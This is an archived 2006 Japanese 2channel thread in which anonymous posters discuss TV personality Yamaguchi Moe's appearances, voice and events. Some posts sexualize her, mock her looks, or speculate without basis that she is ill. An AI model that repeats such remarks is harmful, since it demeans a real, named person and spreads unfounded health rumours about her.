143 :通行人さん@無名タレント:2006/12/15(金) 00:19:58 ID:sRdhDK/9
もえチャン、僕と子づくりしようね(*´Д`)

144 :通行人さん@無名タレント:2006/12/15(金) 01:45:57 ID:UPMPqUli
旦那さんは普通にテレビで『もえちゃんは怒ると怖い』と、
発言していますが?

145 :通行人さん@無名タレント:2006/12/16(土) 02:50:37 ID:vTd3j9Mc
数日テレビで見ないと俺の中で山口もえがどんどん神に近くなっていく

146 :通行人さん@無名タレント:2006/12/17(日) 14:28:49 ID:4asvMFhJ
関西ローカル番組
『たかじんのそこまで言って委員会』に出てるけど
なんか、以前より綺麗になってる

147 :通行人さん@無名タレント:2006/12/17(日) 20:56:14 ID:wC0VfkTu
今年の4月かな?もえちゃんの舞台見に行ったんだけど、
何も、バラエティーだけじゃなく、ファンとして、
来年も、舞台で、お仕事して欲しい。


148 :通行人さん@無名タレント:2006/12/18(月) 01:15:41 ID:JyP7JFyh
うん。

βακαが荒らしにくるからsageといて...

149 :通行人さん@無名タレント:2006/12/18(月) 19:37:26 ID:4At/6SuW
顔デカイw
笑うとシワシワ婆w
心ないテキトーコメントw

150 :通行人さん@無名タレント:2006/12/18(月) 20:34:11 ID:qtPqNUaJ
今、地声が出たぞ(笑)
凄い低いな

151 :通行人さん@無名タレント:2006/12/19(火) 12:47:31 ID:alhxkwWh
ほらね...

152 :通行人さん@無名タレント:2006/12/19(火) 22:32:32 ID:sQKn39gO
    |┃三 ガラッ
    |┃  ____
    |┃/⌒  ⌒\
    |┃(●)  (●) \
――‐.|┃:⌒(__人__)⌒:::::\   えへへっ
    |┃  |r┬-|     |⌒)  遊びに来たお!
    |┃   `ー'ォ     //
    (⌒ヽ・    ・ ̄ /
    |┃ノ       /
    |┃   つ   <
    |┃  (::)(::)   ヽ
    |┃/    >  )
    |┃     (__)



    |┃
    |┃  ____
    |┃/⌒  ⌒\
    |┃ (―)  (―)\
――‐.|┃:⌒(__人__)⌒:::::\
    |┃           |
    |┃          /
    |┃ヽ・    ・ ̄ /
    |┃ \    ,.:∴~・:,゜・~・:,゜・ ,
    |┃ヽ_)つ‘∴・゜゜・・∴~・:,゜・・∴
    |┃  (::)(::)  ヽ    ・゜゜・∴~゜
    |┃/    >  )    ゜゜・∴:,゜・~
    |┃     (__)    :,゜・~:,゜・゜゜・


153 :通行人さん@無名タレント:2006/12/21(木) 08:47:36 ID:KT2X8dhu
今日は録画予約長時間でうれしい悲鳴だ
そういえば出演スケジュールコピペするの忘れてた

154 :通行人さん@無名タレント:2006/12/21(木) 19:22:00 ID:7GO2ZtGg
今、出てます、出てます、モエ様。
嬉しい限りです。9時までダケドモ。

155 :通行人さん@無名タレント:2006/12/21(木) 19:22:10 ID:ExJQ856k
今、出てます、出てます、モエ様。
嬉しい限りです。9時までダケドモ。

156 :通行人さん@無名タレント:2006/12/21(木) 20:10:35 ID:ExJQ856k
さっき、いつもと違う声が出た?あれっ?
気がついた方います?

157 :通行人さん@無名タレント:2006/12/21(木) 22:12:30 ID:S7Ez4PEd
>>156
さっき7時台のなんかの番組でも
声がおかしかった。さっきほどじゃないけど。
あと最近あんま見てなかったけど
かなり痩せてきてね?

158 :通行人さん@無名タレント:2006/12/21(木) 23:59:00 ID:ViyQlT+l
もえチャン、今日もピコピコしてあげるね(*´Д`)

159 :通行人さん@無名タレント:2006/12/22(金) 00:01:54 ID:f0Dvh9B/
なんか喉の病気なの?

160 :通行人さん@無名タレント:2006/12/22(金) 02:05:32 ID:l2Dg0vqu
急性リンパ球性白血病では?

161 :通行人さん@無名タレント:2006/12/22(金) 12:23:50 ID:HxmEMCn7
5年前みたいにまた 手術して声変えるんじゃない?w

162 :通行人さん@無名タレント:2006/12/22(金) 16:28:31 ID:/qQWXVad
おもしろいね。吉本行けば

163 :通行人さん@無名タレント:2006/12/22(金) 21:10:34 ID:NImwazGw
最近、元気ないと感じたのは私だけ?
これからも、どんどん天然発言して欲しい。

164 :通行人さん@無名タレント:2006/12/22(金) 22:50:01 ID:/qQWXVad
夫があんまりかまってくれないの…

165 :通行人さん@無名タレント:2006/12/23(土) 07:47:59 ID:z4w56+hy


166 :通行人さん@無名タレント:2006/12/23(土) 14:49:42 ID:+7daU9Oy
>>164

(*´Д`)ハァハァ(*´Д`)ハァハァ(*´Д`)ハァハァ(*´Д`)ハァハァ(*´Д`)ハァハァ(*´Д`)ハァハァ(*´Д`)ハァハァ

167 :名無しさん@無名タレント:2006/12/24(日) 00:18:34 ID:4OAs3iph
http://images.google.co.jp/images?hl=ja&q=%E3%82%B4%E3%82%AD%E3%83%96%E3%83%AA&lr=&ie=UTF-8&oe=UTF-8&sa=N&tab=wi

168 :通行人さん@無名タレント:2006/12/24(日) 15:08:32 ID:JOtqT3dH
もえナース(;´Д`)ハァハァ

169 :通行人さん@無名タレント:2006/12/24(日) 15:39:06 ID:rWsovZpC
最近一段と可愛いな
ナース姿は犯罪もんだよ

170 :通行人さん@無名タレント:2006/12/24(日) 17:51:41 ID:x53vuXEE

                     ||||||
        |||||    ∠ ̄ ̄\ |
        ∋oノハヽo∈    〜|/´D`|/  細木数子スレからキマスタ http://tv7.2ch.net/test/read.cgi/geino/1166444511/
        (´D` ) スタッ  / y⊂)
        / y(⌒ヽ\    U〉  ⌒l
キマスタ   し( (__)し  /(__ノ ~U、、スタッ


171 :通行人さん@無名タレント:2006/12/24(日) 18:24:42 ID:2irhkdgU
来年1月かな?山梨の方でイベントあるみたいよ。
くわしくは、もえホームページでね。
前回、遠い所で私いけなかったんで、来年、
行こうかと思います。東京から、1万円ぐらいで、
行けるらしいから。今から、楽しみです。
また、もえちゃん生で見た事ある方、感想を?
確かにテレビでしか見れないから、生で見れるの
嬉しいですよね。

172 :通行人さん@無名タレント:2006/12/25(月) 16:55:38 ID:rUBMj7sI
>>171
>もえちゃん生




(*´Д`)ハァハァ(*´Д`)ハァハァ(*´Д`)ハァハァ(*´Д`)ハァハァ(*´Д`)ハァハァ(*´Д`)ハァハァ(´ 3`)

173 :通行人さん@無名タレント:2006/12/26(火) 01:10:25 ID:UDFa9hmY
オエエェェェェェェェーッ

174 :通行人さん@無名タレント:2006/12/26(火) 14:25:41 ID:LrG+1KXk
この前の2時チャオでコメンテーターの人?に、
写真映りいいですねーって言って、その後、
その人、むっとした顔で、それって実物悪いって
言ってるようなもんじゃないって怒ってた。
最近のもえちゃんは言動が突拍子ないって感じがする。
前から、あーだったんかな?

175 :通行人さん@無名タレント:2006/12/26(火) 14:39:33 ID:LrG+1KXk
最近、何気にきつい事言うようになった。
絶対、いい子ちゃんだと思ったのに。

176 :通行人さん@無名タレント:2006/12/26(火) 15:15:52 ID:UDFa9hmY
顔面の約半分がデコだからキモイんだって こいつはw

177 :通行人さん@無名タレント:2006/12/26(火) 16:13:34 ID:SkHdn0yz
キモイ人がキモイって言っても…

178 :通行人さん@無名タレント:2006/12/26(火) 20:25:07 ID:LrG+1KXk
早く子供生んで、ママドルになって欲しい。
仕事、増えるよー。

179 :通行人さん@無名タレント:2006/12/26(火) 22:06:30 ID:G6nRGIeL
今日、大阪の黒門市場で山口もえ、清水ミチコ、中尾彬の3人で
グルメレポートやってた。関西ローカルかな。

180 :通行人さん@無名タレント:2006/12/26(火) 22:15:49 ID:YSaPQaiO
>>175
>きつい事言うようになった



(*´Д`)ハァハァ
(*´Д`)ハァハァ
(*´Д`)ハァハァ
(*´Д`)ハァハァ
(*´Д`)ハァハァ

181 :通行人さん@無名タレント:2006/12/27(水) 02:53:11 ID:Uro80bSO
>>175
昔から毒舌が売りですけど

182 :通行人さん@無名タレント:2006/12/28(木) 06:51:41 ID:pV+WVb0l
わがままなお嬢様育ちで他人の痛みに鈍感なだけだろ

183 :通行人さん@無名タレント:2006/12/28(木) 08:50:49 ID:wUfjrPMr
いままで沢山傷つけられてきたんですね。
オーヨシヨシ

184 :通行人さん@無名タレント:2006/12/28(木) 19:24:19 ID:CqF//SCG
来年、ミリオネラに出るらしい。
どこまで、いくんかなー。案外いけたりして?
それとも、誰?かの応援かもね。

185 :通行人さん@無名タレント:2006/12/30(土) 00:51:03 ID:dJSuggQs
きもい デカヅラさらすなよw

186 :通行人さん@無名タレント:2006/12/30(土) 02:28:59 ID:iri3f9F3
またキモイ人か…

37 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)